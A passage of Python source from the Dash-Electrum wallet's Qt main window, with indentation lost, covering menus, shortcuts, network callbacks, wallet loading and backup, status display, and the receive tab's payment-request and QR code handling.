tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-dash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog)
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
# self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# 'proposals']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
backup_file = getattr(self.wallet.storage, 'backup_file', None)
if backup_file:
backup_message = self.wallet.storage.backup_message
self.show_warning(backup_message, title=_('Information'))
if self.network.tor_auto_on and not self.network.tor_on:
self.show_warning(self.network.tor_warn_msg +
self.network.tor_docs_uri_qt)
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418; try to at least show popup:
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee', 'proposals']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
elif event == 'proposals':
self.proposals_changed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.masternode_manager = MasternodeManager(self.wallet, self.config)
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Dash-Electrum Testnet" if constants.net.TESTNET else "Dash-Electrum"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Dash coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Dash-Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Dash-Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.dash.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("https://docs.dash.org/en/latest/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents)
self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=False))
self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
help_menu.addAction(self._auto_crash_reports)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key(BaseCrashReporter.config_key, state)
self.setup_exception_hook()
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('dash:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Dash-Electrum",
(_("Version")+" %s" % self.wallet.electrum_version + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Dash.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Dash system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/akhavr/electrum-dash/issues\">https://github.com/akhavr/electrum-dash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Dash-Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Dash-Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
# iterate over a copy, since transactions are removed from the list below
for tx in list(self.tx_notifications):
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Dash-Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Dash-Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate, self.num_zeros) + ' duffs/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
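# Keep a coin amount edit and a fiat amount edit in sync: editing one
# recomputes the other from the current exchange rate. The 'follows' flags
# prevent the two textChanged handlers from retriggering each other.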
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
self.masternode_manager.send_subscriptions()
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_proposals_tab()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Dash address where the payment should be received. Note that each payment request uses a different Dash address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Dash addresses.'),
_('The Dash address never expires and will always be part of this Dash-Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.setObjectName("receive_container")
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
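# Build the payment URI for a saved request, appending the optional request
# parameters (creation time, expiry, requestor name and signature).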
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
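# If the configured alias resolves to an address owned by this wallet,
# prompt for the password (when the keystore is encrypted) and sign the request.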
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} duffs are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
